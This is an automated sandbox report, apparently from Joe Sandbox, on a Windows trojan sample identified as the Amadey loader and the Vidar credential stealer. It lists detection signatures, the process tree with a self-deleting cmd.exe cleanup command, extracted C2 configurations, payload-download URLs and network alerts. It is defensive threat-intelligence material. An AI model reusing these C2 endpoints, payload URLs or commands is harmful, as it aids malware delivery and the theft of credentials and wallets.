Edit tour

Windows Analysis Report
IRqsWvBBMc.exe

Overview

General Information

Sample name:	IRqsWvBBMc.exe renamed because original name is a hash value
Original sample name:	78343efcb6f731cd7668e648ed73e40f.exe
Analysis ID:	1482971
MD5:	78343efcb6f731cd7668e648ed73e40f
SHA1:	7d7d8ff1aa08a1e4bfc766ec8a59576de2e49e99
SHA256:	f0cca8a13c6f8d768fb49efc17a0181cde1c28f9afb0be916b441bcdf75194ae
Tags:	32exetrojan
Infos:

Detection

Amadey, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Amadeys stealer DLL

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

IRqsWvBBMc.exe (PID: 2544 cmdline: "C:\Users\user\Desktop\IRqsWvBBMc.exe" MD5: 78343EFCB6F731CD7668E648ED73E40F)

axplong.exe (PID: 4600 cmdline: "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: 78343EFCB6F731CD7668E648ED73E40F)

axplong.exe (PID: 1492 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 78343EFCB6F731CD7668E648ED73E40F)

axplong.exe (PID: 6432 cmdline: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe MD5: 78343EFCB6F731CD7668E648ED73E40F)

server.exe (PID: 6264 cmdline: "C:\Users\user\AppData\Local\Temp\1000019001\server.exe" MD5: BF9ACB6E48B25A64D9061B86260CA0B6)

build_2024-07-25_20-56.exe (PID: 2260 cmdline: "C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe" MD5: BEA49EAB907AF8AD2CBEA9BFB807AAE2)

CFHIIJDBKE.exe (PID: 1428 cmdline: "C:\ProgramData\CFHIIJDBKE.exe" MD5: 190E4ED7759276E78D16398673996B2B)

cmd.exe (PID: 6420 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFCFBFHIEBKJ" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 6076 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

WerFault.exe (PID: 640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 3000 MD5: C31336C1EFC2CCB44B4326EA793040F2)

CFHIIJDBKE.exe (PID: 508 cmdline: C:\ProgramData\CFHIIJDBKE.exe MD5: 190E4ED7759276E78D16398673996B2B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "e0c99e9ff0b95355e8ec19c548ab0f83"}

Threatname: Amadey

{"C2 url": ["http://185.215.113.16/Jo89Ku7d/index.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.2168239897.00000000008F1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2144127481.0000000000141000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000003.2796849673.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000003.2129982774.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000002.3355199740.00000000024FD000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x12f8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.2103618425.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000003.2127712847.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000007.00000003.2708396378.0000000004920000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000003.00000002.2170594328.00000000008F1000.00000040.00000001.01000000.00000007.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: build_2024-07-25_20-56.exe PID: 2260	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: build_2024-07-25_20-56.exe PID: 2260	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: build_2024-07-25_20-56.exe PID: 2260	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author
10.2.build_2024-07-25_20-56.exe.3fa0e67.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
10.2.build_2024-07-25_20-56.exe.400000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
10.3.build_2024-07-25_20-56.exe.3fd0000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
10.2.build_2024-07-25_20-56.exe.3fa0e67.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
10.2.build_2024-07-25_20-56.exe.400000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.axplong.exe.8f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
2.2.axplong.exe.8f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.IRqsWvBBMc.exe.140000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
7.2.axplong.exe.8f0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 4 entries

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:14.062255+0200
SID:	2028765
Source Port:	60785
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T12:57:08.251725+0200
SID:	2044696
Source Port:	60779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Vidar Stealer Form Exfil - Source IP: 192.168.2.6 - Destination IP: 77.91.101.71

Timestamp:	2024-07-26T12:58:02.137733+0200
SID:	2054495
Source Port:	60852
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 198.46.178.145 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:57:54.209832+0200
SID:	2011803
Source Port:	80
Destination Port:	60836
Protocol:	TCP
Classtype:	Executable code was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:56:47.197530+0200
SID:	2022930
Source Port:	443
Destination Port:	60776
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:45.082487+0200
SID:	2028765
Source Port:	60831
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 - Source IP: 5.75.212.60 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:57:20.110087+0200
SID:	2051831
Source Port:	443
Destination Port:	60793
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 5.75.212.60 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:57:24.333325+0200
SID:	2011803
Source Port:	443
Destination Port:	60798
Protocol:	TCP
Classtype:	Executable code was detected

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T12:57:03.819607+0200
SID:	2856147
Source Port:	60778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:16.709500+0200
SID:	2028765
Source Port:	60789
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected - Source IP: 5.75.212.60 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:57:32.470357+0200
SID:	2011803
Source Port:	443
Destination Port:	60812
Protocol:	TCP
Classtype:	Executable code was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:58:00.607625+0200
SID:	2028765
Source Port:	60850
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:20.865992+0200
SID:	2028765
Source Port:	60796
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:47.120744+0200
SID:	2028765
Source Port:	60834
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 185.215.113.16 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:57:09.097227+0200
SID:	2009080
Source Port:	80
Destination Port:	60779
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 185.215.113.16 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:57:06.691169+0200
SID:	2009080
Source Port:	80
Destination Port:	60778
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:19.446065+0200
SID:	2028765
Source Port:	60793
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Suspected BPFDoor TCP Magic Packet (Inbound) - Source IP: 91.92.250.213 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:58:09.642132+0200
SID:	2036752
Source Port:	1110
Destination Port:	60854
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:39.040939+0200
SID:	2028765
Source Port:	60823
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Amadey CnC Response M1 - Source IP: 185.215.113.16 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:57:04.103660+0200
SID:	2856122
Source Port:	80
Destination Port:	60778
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:43.565361+0200
SID:	2028765
Source Port:	60829
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:17.951760+0200
SID:	2028765
Source Port:	60791
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:37.483798+0200
SID:	2028765
Source Port:	60820
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:25.346141+0200
SID:	2028765
Source Port:	60803
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:26.556702+0200
SID:	2028765
Source Port:	60805
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:33.859158+0200
SID:	2028765
Source Port:	60815
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:22.345846+0200
SID:	2028765
Source Port:	60798
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:29.578629+0200
SID:	2028765
Source Port:	60809
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.6 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T12:57:04.345407+0200
SID:	2803305
Source Port:	60778
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.114.59.183 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:56:45.881578+0200
SID:	2022930
Source Port:	443
Destination Port:	60774
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.6 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T12:57:08.494261+0200
SID:	2803305
Source Port:	60779
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 185.215.113.16 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:57:06.629014+0200
SID:	2009080
Source Port:	80
Destination Port:	60778
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 - Source IP: 192.168.2.6 - Destination IP: 185.215.113.16

Timestamp:	2024-07-26T12:57:10.822923+0200
SID:	2044696
Source Port:	60780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 5.75.212.60 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:57:18.705865+0200
SID:	2044247
Source Port:	443
Destination Port:	60791
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:35.797297+0200
SID:	2028765
Source Port:	60817
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile - Source IP: 198.46.178.145 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:57:56.003578+0200
SID:	2009080
Source Port:	80
Destination Port:	60836
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:31.633511+0200
SID:	2028765
Source Port:	60812
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:28.405558+0200
SID:	2028765
Source Port:	60807
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T12:56:19.847039+0200
SID:	2022930
Source Port:	443
Destination Port:	49714
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:15.209645+0200
SID:	2028765
Source Port:	60787
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:17.251728+0200
SID:	2049087
Source Port:	60789
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:42.252981+0200
SID:	2028765
Source Port:	60827
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - [Abuse.ch] Possible Dridex - Source IP: 192.168.2.6 - Destination IP: 5.75.212.60

Timestamp:	2024-07-26T12:57:59.103857+0200
SID:	2028765
Source Port:	60848
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: IRqsWvBBMc.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://5.75.212.60/sqls.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/inc/build_2024-07-25_20-56.exeq	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/inc/server.exe9c5867ded	Avira URL Cloud: Label: phishing
Source: https://5.75.212.60/nss3.dllll	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/inc/server.exe	Avira URL Cloud: Label: phishing
Source: https://steamcommunity.com/profiles/76561199747278259/badges	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/msvcp140.dlld	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpft	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpnu	Avira URL Cloud: Label: phishing
Source: https://5.75.212.60/(	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpUsers	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpncoded	Avira URL Cloud: Label: phishing
Source: https://5.75.212.60/?	Avira URL Cloud: Label: malware
Source: https://t.me/armad2a	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/4	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/L	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/softokn3.dllj	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/E	Avira URL Cloud: Label: malware
Source: https://5.75.212.60/Z	Avira URL Cloud: Label: malware
Source: https://steamcommunity.com/profiles/76561199747278259	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.php6323e228833c10fe3eb39f1caffb81382ae#xe	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/Jo89Ku7d/index.phpncodedy1	Avira URL Cloud: Label: phishing
Source: https://5.75.212.60/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/inc/server.exe9c5867ee8	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/inc/build_2024-07-25_20-56.exe	Avira URL Cloud: Label: phishing
Source: https://steamcommunity.com/profiles/76561199747278259/inventory/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199747278259"], "Botnet": "e0c99e9ff0b95355e8ec19c548ab0f83"}
Source: axplong.exe.6432.7.memstrmin	Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.16/Jo89Ku7d/index.php"]}

Multi AV Scanner detection for domain / URL

Source: arpdabl.zapto.org	Virustotal: Detection: 11%	Perma Link
Source: https://5.75.212.60/sqls.dll	Virustotal: Detection: 11%	Perma Link
Source: http://185.215.113.16/inc/server.exe	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.16/Jo89Ku7d/index.phpft	Virustotal: Detection: 14%	Perma Link
Source: http://185.215.113.16/Jo89Ku7d/index.phpnu	Virustotal: Detection: 14%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\server[1].exe	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\build_2024-07-25_20-56[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	ReversingLabs: Detection: 36%

Multi AV Scanner detection for submitted file

Source: IRqsWvBBMc.exe

Virustotal: Detection: 54%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\build_2024-07-25_20-56[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: IRqsWvBBMc.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00406D50 CryptUnprotectData,LocalAlloc,LocalFree,	10_2_00406D50
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00406CD0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	10_2_00406CD0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00410DF0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	10_2_00410DF0
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00408980 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcatA,PK11_FreeSlot,lstrcatA,	10_2_00408980
